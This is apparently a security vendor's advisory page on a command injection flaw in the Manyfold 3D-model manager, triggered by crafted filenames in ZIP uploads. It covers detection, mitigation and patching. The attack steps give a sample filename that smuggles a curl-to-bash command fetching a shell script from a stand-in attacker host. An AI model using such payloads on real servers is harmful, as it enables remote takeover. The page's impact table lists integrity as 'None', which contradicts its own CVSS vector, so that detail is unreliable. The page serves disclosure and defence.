Join the Cyber Forum: Threat Intel on May 12, 2026 to learn how AI is reshaping threat defense.Join the Virtual Cyber Forum: Threat IntelRegister Now
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-27635

CVE-2026-27635: Manyfold RCE Vulnerability

CVE-2026-27635 is a remote code execution flaw in Manyfold that allows authenticated users to execute arbitrary code via malicious ZIP uploads. This article covers the technical details, affected versions, and patches.

Published: February 27, 2026

CVE-2026-27635 Overview

CVE-2026-27635 is a command injection vulnerability in Manyfold, an open source, self-hosted web application for managing collections of 3D models, particularly focused on 3D printing. Prior to version 0.133.0, when model render generation is enabled, a logged-in user can achieve remote code execution (RCE) by uploading a ZIP file containing a file with a shell metacharacter in its name. The filename reaches a Ruby backtick call unsanitized, allowing arbitrary command execution on the host system.

Critical Impact

Authenticated attackers can achieve full remote code execution on the Manyfold server by uploading a maliciously crafted ZIP file with shell metacharacters in filenames, potentially compromising the entire hosting environment.

Affected Products

  • Manyfold versions prior to 0.133.0
  • Self-hosted Manyfold deployments with model render generation enabled

Discovery Timeline

  • February 26, 2026 - CVE-2026-27635 published to NVD
  • February 26, 2026 - Last updated in NVD database

Technical Details for CVE-2026-27635

Vulnerability Analysis

This vulnerability is classified as CWE-78 (OS Command Injection), one of the most severe vulnerability classes due to its potential for complete system compromise. The flaw exists in how Manyfold processes uploaded ZIP archives when the model render generation feature is active.

When a user uploads a ZIP file containing 3D models, the application extracts the files and processes them for render generation. During this process, filenames from the uploaded archive are passed to a Ruby backtick (`) call without proper sanitization. Ruby backticks execute the enclosed string as a shell command, making unsanitized user input in this context extremely dangerous.

An attacker with valid authentication credentials can craft a ZIP archive containing files with specially crafted names that include shell metacharacters such as backticks, semicolons, pipes, or command substitution syntax. When the application processes these filenames, the embedded commands execute with the privileges of the Manyfold application process.

Root Cause

The root cause of this vulnerability is improper input validation and the unsafe use of shell command execution in Ruby. The application fails to sanitize or escape filenames extracted from user-uploaded ZIP archives before passing them to Ruby's backtick operator. This allows shell metacharacters embedded in filenames to be interpreted as command syntax rather than literal characters.

The secure approach would involve using Ruby's Shellwords.escape() method or avoiding shell execution entirely by using direct API calls for file operations.

Attack Vector

The attack requires network access and valid user authentication to the Manyfold application. The attacker must:

  1. Authenticate to the Manyfold instance
  2. Create a ZIP archive containing a file with shell metacharacters in the filename (e.g., `whoami`.stl or ; curl attacker.com/shell.sh | bash ;.stl)
  3. Upload the malicious ZIP file as a 3D model
  4. Wait for the model render generation process to trigger the command execution

The complexity is elevated due to the requirement that model render generation must be enabled, but once these conditions are met, exploitation is straightforward and reliable.

For detailed technical information about the vulnerability mechanism, refer to the GitHub Security Advisory GHSA-p589-cf26-v7h2.

Detection Methods for CVE-2026-27635

Indicators of Compromise

  • Presence of ZIP files with unusual filenames containing shell metacharacters (backticks, semicolons, pipes, $() patterns)
  • Unexpected child processes spawned by the Manyfold application or Ruby interpreter
  • Unusual network connections originating from the Manyfold server process
  • System command execution logs showing commands run under the Manyfold service account context

Detection Strategies

  • Monitor file upload activity for ZIP archives containing files with shell metacharacters in filenames
  • Implement application-level logging to track all model uploads and render generation jobs
  • Deploy endpoint detection to identify unexpected process execution chains from the Manyfold application
  • Configure web application firewall rules to inspect uploaded archive contents for suspicious filename patterns

Monitoring Recommendations

  • Enable verbose logging for the Manyfold application and review logs for anomalous filename patterns
  • Set up alerts for any shell command execution originating from the Manyfold process context
  • Monitor network egress from the Manyfold server for signs of reverse shell connections or data exfiltration
  • Implement file integrity monitoring on critical system directories

How to Mitigate CVE-2026-27635

Immediate Actions Required

  • Upgrade Manyfold to version 0.133.0 or later immediately
  • If immediate upgrade is not possible, disable the model render generation feature until patching is complete
  • Review upload logs for any suspicious ZIP files with unusual filenames
  • Audit system for signs of compromise if the vulnerable feature was enabled

Patch Information

The vulnerability has been fixed in Manyfold version 0.133.0. The patch addresses the unsafe handling of filenames by implementing proper input sanitization before passing values to shell commands. Users should upgrade to this version or later to remediate the vulnerability.

For patch details, see the Manyfold Release v0.133.0.

Workarounds

  • Disable model render generation in Manyfold settings until the patch can be applied
  • Restrict user registration and access to trusted users only
  • Implement network segmentation to limit the blast radius if the Manyfold server is compromised
  • Deploy a web application firewall to filter uploaded content containing suspicious patterns
bash
# Disable model render generation (configuration may vary based on deployment)
# Review your Manyfold configuration and disable render generation features
# Consult documentation at: https://github.com/manyfold3d/manyfold

# Restrict network egress from the Manyfold container/server
iptables -A OUTPUT -m owner --uid-owner manyfold -j DROP

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeRCE

  • Vendor/TechManyfold

  • SeverityHIGH

  • CVSS Score7.5

  • EPSS Probability0.05%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
  • Impact Assessment
  • ConfidentialityHigh
  • IntegrityNone
  • AvailabilityHigh
  • CWE References
  • CWE-78
  • Technical References
  • GitHub Manyfold Release v0.133.0

  • GitHub Security Advisory GHSA-p589-cf26-v7h2
  • Related CVEs
  • CVE-2026-28225: Manyfold Auth Bypass Vulnerability

  • CVE-2026-27933: Manyfold Auth Bypass Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English